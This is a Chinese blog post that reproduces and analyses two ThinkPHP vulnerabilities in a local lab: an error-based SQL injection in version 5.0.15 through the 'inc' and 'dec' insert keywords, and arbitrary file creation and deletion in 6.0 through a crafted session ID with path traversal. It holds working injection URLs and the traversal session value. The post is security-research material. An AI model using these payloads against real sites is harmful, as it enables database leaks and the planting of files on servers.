
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>TP5.0.24 | buxqm</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=3, minimum-scale=1">
    
    <meta name="author" content="Ycj">
    
    <meta name="description" content="TP漏洞复现合计前言随心复现，在审计代码前，可以先看看开发手册，大致了解一下框架结构能够使你更快入手。
TP5.0.15SQL注入复现环境配置使用composer安装TP5.0.15
composer能够更加方便、快速的安装准确的框架版本，windows环境在官网下载安装程序，选择PHP版本(最好是">
    
    
    
    
    <link rel="alternate" href="/atom.xml" title="buxqm" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/author.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/author.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      <div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.svg" alt="buxqm" title="buxqm"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="buxqm">buxqm</a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
					<li>
					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="text" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:yoursite.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>

    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2020/06/30/TP5.0.24漏洞复现合集/" title="TP5.0.24" itemprop="url">TP5.0.24</a>
  </h1>
  <p class="article-author">By
    
      <a href="http://yoursite.com" title="Ycj">Ycj</a>
    </p>
  <p class="article-time">
    <time datetime="2020-06-29T16:00:00.000Z" itemprop="datePublished">2020-06-30</time>
    Updated:<time datetime="2020-10-16T09:31:43.309Z" itemprop="dateModified">2020-10-16</time>
    
  </p>
</header>
	<div class="article-content">
		
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TP漏洞复现合计"><span class="toc-number">1.</span> <span class="toc-text">TP漏洞复现合计</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-15SQL注入复现"><span class="toc-number">1.2.</span> <span class="toc-text">TP5.0.15SQL注入复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置"><span class="toc-number">1.2.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数据库配置"><span class="toc-number">1.2.2.</span> <span class="toc-text">数据库配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现"><span class="toc-number">1.2.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析"><span class="toc-number">1.2.4.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP6-0session-任意文件创建-amp-删除漏洞复现"><span class="toc-number">1.3.</span> <span class="toc-text">TP6.0session 任意文件创建&amp;删除漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置-1"><span class="toc-number">1.3.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-1"><span class="toc-number">1.3.3.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li></ol></li></ol>
		</div>
		
		<h1 id="TP漏洞复现合计"><a href="#TP漏洞复现合计" class="headerlink" title="TP漏洞复现合计"></a>TP漏洞复现合计</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>随心复现，在审计代码前，可以先看看<a href="https://www.kancloud.cn/manual/thinkphp5/122950" target="_blank" rel="noopener">开发手册</a>，大致了解一下框架结构能够使你更快入手。</p>
<h2 id="TP5-0-15SQL注入复现"><a href="#TP5-0-15SQL注入复现" class="headerlink" title="TP5.0.15SQL注入复现"></a>TP5.0.15SQL注入复现</h2><h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h3><p>使用composer安装TP5.0.15</p>
<p>composer能够更加方便、快速的安装准确的框架版本，windows环境在官网下载安装程序，选择PHP版本(最好是大于7.2)，安装时可以配置一下代理，不然会很慢。</p>
<p>安装好后执行</p>
<pre><code>composer create-project topthink/think tp 5.0.15</code></pre><p>更多的版本也可以在<a href="https://packagist.org/" target="_blank" rel="noopener">composer官网</a>找到。</p>
<p>使用composer的好处是能够快速切换版本，只需要将framework改成你自己想要的版本，然后执行<code>composer update</code>就好了。</p>
<p><img src="https://i.loli.net/2020/10/04/EazP48swVgmC6pq.png" alt="image.png"></p>
<h3 id="数据库配置"><a href="#数据库配置" class="headerlink" title="数据库配置"></a>数据库配置</h3><p>首先建立一个数据库tptest，然后建立一个user表，字段是id,username。</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005191103224.png" alt="image-20201005191103224"></p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>漏洞触发点在执行数据插入的时候，所以先在index控制器创建一个插入数据的方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public  function testsql()</span><br><span class="line">    &#123;</span><br><span class="line">        $username = input(&apos;get.username/a&apos;);</span><br><span class="line">        db(&apos;user&apos;)-&gt;where([&apos;id&apos;=&gt; 1])-&gt;insert([&apos;username&apos;=&gt;$username]);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/public/index.php/index/index/testsql?username[0]=inc&amp;username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]=1</span><br></pre></td></tr></table></figure>

<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005191717380.png" alt="image-20201005191717380"></p>
<p>报错注入成功。</p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>跟入insert方法，重点在生成sql语句的函数</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005192213389.png" alt="image-20201005192213389"></p>
<p>跟入<code>$this-&gt;builder-&gt;insert</code>方法</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005192349737.png" alt="image-20201005192349737"></p>
<p>跟进parseData方法，看看它是如何处理我们的数据。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">     <span class="keyword">foreach</span> ($data <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">         $item = <span class="keyword">$this</span>-&gt;parseKey($key, $options);</span><br><span class="line">         <span class="keyword">if</span> (is_object($val) &amp;&amp; method_exists($val, <span class="string">'__toString'</span>)) &#123;</span><br><span class="line">             <span class="comment">// 对象数据写入</span></span><br><span class="line">             $val = $val-&gt;__toString();</span><br><span class="line">         &#125;</span><br><span class="line"><span class="keyword">elseif</span> (is_array($val) &amp;&amp; !<span class="keyword">empty</span>($val)) &#123;</span><br><span class="line">             <span class="keyword">switch</span> ($val[<span class="number">0</span>]) &#123;</span><br><span class="line">                 <span class="keyword">case</span> <span class="string">'exp'</span>:</span><br><span class="line">                     $result[$item] = $val[<span class="number">1</span>];</span><br><span class="line">                     <span class="keyword">break</span>;</span><br><span class="line">                 <span class="keyword">case</span> <span class="string">'inc'</span>:</span><br><span class="line">                     $result[$item] = <span class="keyword">$this</span>-&gt;parseKey($val[<span class="number">1</span>]) . <span class="string">'+'</span> . floatval($val[<span class="number">2</span>]);</span><br><span class="line">                     <span class="keyword">break</span>;</span><br><span class="line">                 <span class="keyword">case</span> <span class="string">'dec'</span>:</span><br><span class="line">                     $result[$item] = <span class="keyword">$this</span>-&gt;parseKey($val[<span class="number">1</span>]) . <span class="string">'-'</span> . floatval($val[<span class="number">2</span>]);</span><br><span class="line">                     <span class="keyword">break</span>;</span><br><span class="line">             &#125;</span><br><span class="line">         &#125;</span><br></pre></td></tr></table></figure>

<p>可以在用户手册看到说明，在thinkphp5.0.5加入了exp、inc、dec方法来处理数据，主要是为了方便字段的自增与自减，这里就是漏洞触发点。</p>
<p>由于没有对数据做任何过滤处理，处理完数据后，直接拼接成sql语句并执行，才导致报错注入的发生。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO `user` (`username`) VALUES (updatexml(1,concat(0x7,user(),0x7e),1)+1)</span><br></pre></td></tr></table></figure>

<p>我们可以注意到，与inc效果类似的关键字还有exp与dec，于是我们试一试这两个关键字能不能触发。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/public/index.php/index/index/testsql?username[0]=dec&amp;username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]=1</span><br></pre></td></tr></table></figure>

<p>dec关键字触发漏洞成功，但是exp关键字触发漏洞失败了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/public/index.php/index/index/testsql?username[0]=exp&amp;username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]=1</span><br></pre></td></tr></table></figure>

<p>经过调试，发现thinkphp对输入的数据进行了过滤，exp排在黑名单榜首。</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005193636907.png" alt="image-20201005193636907"></p>
<p>在exp后加了一个空格，导致case判断失败。</p>
<h2 id="TP6-0session-任意文件创建-amp-删除漏洞复现"><a href="#TP6-0session-任意文件创建-amp-删除漏洞复现" class="headerlink" title="TP6.0session 任意文件创建&amp;删除漏洞复现"></a>TP6.0session 任意文件创建&amp;删除漏洞复现</h2><h3 id="环境配置-1"><a href="#环境配置-1" class="headerlink" title="环境配置"></a>环境配置</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">composer create-project topthink/think tp 6.0.0</span><br></pre></td></tr></table></figure>

<p>下载好后，将composer.json中的数据修改成如下图所示</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016150629322.png" alt="image-20201016150629322"></p>
<p>在app\middleware.php中开启session功能</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016150801682.png" alt="image-20201016150801682"></p>
<h3 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>漏洞利用点是在session保存时，session文件名可控导致的任意文件创建。</p>
<p>在index控制器引入Session类并添加如下测试方法。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">facade</span>\<span class="title">Session</span>;  </span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">session_test</span><span class="params">()</span></span>&#123;</span><br><span class="line">    Session::set(<span class="string">'id'</span>,<span class="string">'name'</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>访问<code>http://localhost/public/index.php/index/session_test</code>，可以看见在/runtime/session文件夹下根据sessionID创建了session文件，内容就是将session中的数据序列化。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201016152149812.png" alt="image-20201016152149812"></p>
<p>修改sessionID为：aaaaaaaaaaaaaaaaaaaaaaaaaaaa.php(长度为32位)，可以看到成功在\runtime\session文件夹下生成了一个php文件。</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016155905781.png" alt="image-20201016155905781"></p>
<p>尝试一下目录穿越，<code>/../../../public/aaaaaaaaaaa.php</code>成功写入public文件夹中。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201016162011090.png" alt="image-20201016162011090"></p>
<h3 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>当执行Session::set方法时，会调用\vendor\topthink\framework\src\think\session\Store.php中的setId方法</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016163335534.png" alt="image-20201016163335534"></p>
<p>当传入的SessionId满足32位长度时，就将id设为SessionId，否则就重设SessionId。</p>
<p>之后进入save方法保存用户session。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">save</span><span class="params">()</span>: <span class="title">void</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;clearFlashData();</span><br><span class="line">    $sessionId = <span class="keyword">$this</span>-&gt;getId();</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;data)) &#123;</span><br><span class="line">        $data = <span class="keyword">$this</span>-&gt;serialize(<span class="keyword">$this</span>-&gt;data);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;handler-&gt;write($sessionId, $data);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;handler-&gt;delete($sessionId);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;init = <span class="keyword">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟入write函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">protected function writeFile($path, $content): bool</span><br><span class="line">&#123;</span><br><span class="line">    return (bool) file_put_contents($path, $content, LOCK_EX);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>它使用file_put_contents函数将sessionID作为文件名写入文件，所以可以通过目录穿越实现任意文件上传，利用条件是用户能够控制Session内容。</p>
<p>在执行save方法时，可以看到当session内容为空时。使用unlink删除文件，文件名控制方法与上面一样。</p>
  
	</div>
		<footer class="article-footer clearfix">


<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/漏洞复现/">漏洞复现</a>
</div>



<div class="article-share" id="share">

  <div data-url="http://yoursite.com/2020/06/30/TP5.0.24漏洞复现合集/" data-title="TP5.0.24 | buxqm" data-tsina="" class="share clearfix">
  </div>

</div>
</footer>   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2020/09/27/极客巅峰/" title="极客巅峰+月饼赛">
  <strong>PREVIOUS:</strong><br/>
  <span>
  极客巅峰+月饼赛</span>
</a>
</div>


<div class="next">
<a href="/2020/06/30/XXE专题/"  title="XML学习">
 <strong>NEXT:</strong><br/> 
 <span>XML学习
</span>
</a>
</div>

</nav>

	
<section class="comment">
	<div class="ds-thread"></div>
</section>

</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TP漏洞复现合计"><span class="toc-number">1.</span> <span class="toc-text">TP漏洞复现合计</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-15SQL注入复现"><span class="toc-number">1.2.</span> <span class="toc-text">TP5.0.15SQL注入复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置"><span class="toc-number">1.2.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数据库配置"><span class="toc-number">1.2.2.</span> <span class="toc-text">数据库配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现"><span class="toc-number">1.2.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析"><span class="toc-number">1.2.4.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP6-0session-任意文件创建-amp-删除漏洞复现"><span class="toc-number">1.3.</span> <span class="toc-text">TP6.0session 任意文件创建&amp;删除漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置-1"><span class="toc-number">1.3.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-1"><span class="toc-number">1.3.3.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li></ol></li></ol>
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
			<li><a href="/categories/XXE/" title="XXE">XXE<sup>1</sup></a></li>
		
			<li><a href="/categories/pdo/" title="pdo">pdo<sup>1</sup></a></li>
		
			<li><a href="/categories/trick/" title="trick">trick<sup>1</sup></a></li>
		
			<li><a href="/categories/writeup/" title="writeup">writeup<sup>2</sup></a></li>
		
			<li><a href="/categories/专题-writeup/" title="专题  writeup">专题  writeup<sup>1</sup></a></li>
		
			<li><a href="/categories/协议学习/" title="协议学习">协议学习<sup>1</sup></a></li>
		
			<li><a href="/categories/漏洞复现/" title="漏洞复现">漏洞复现<sup>1</sup></a></li>
		
			<li><a href="/categories/西湖论剑/" title="西湖论剑">西湖论剑<sup>1</sup></a></li>
		
		</ul>
</div>


  

  <div class="rsspart">
	<a href="/atom.xml" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<section class="info">
		<p> Hello <br/>
			似水流年</p>
	</section>
	 
	<div class="social-font clearfix">
		
		
		
		
		
	</div>
		<p class="copyright">Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/A-limon/pacman" target="_blank" title="Pacman">Pacman</a> © 2020 
		
		<a href="http://yoursite.com" target="_blank" title="Ycj">Ycj</a>
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.1.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else
    {
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      h  = $('article h2')
      ah = $('article h2'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  if(ah.length==0){
    t.css('display','none');
  }else{
    c.click(function(){
      ta.css('display', 'block').addClass('fadeIn');
    });
    o.click(function(){
      ta.css('display', 'none');
    });
    $(window).scroll(function(){
      ta.css("top",Math.max(140,320-$(this).scrollTop()));
    });
  };
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina');
  var html = [
  '<a href="#" class="overlay" id="qrcode"></a>',
  '<div class="qrcode clearfix"><span>扫描二维码分享到微信朋友圈</span><a class="qrclose" href="#share"></a><strong>Loading...Please wait</strong><img id="qrcode-pic" data-src="http://s.jiathis.com/qrcode.php?url=' + encodedUrl + '"/></div>',
  '<a href="#textlogo" class="article-back-to-top" title="Top"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="QRcode"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="Weibo"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);
  $('.article-share-qrcode').click(function(){
    var imgSrc = $('#qrcode-pic').attr('data-src');
    $('#qrcode-pic').attr('src', imgSrc);
    $('#qrcode-pic').load(function(){
        $('.qrcode strong').text(' ');
    });
  });
});     
</script>


<script type="text/javascript">
  var duoshuoQuery = {short_name:""};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0] 
    || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
</script> 





  </body>
</html>
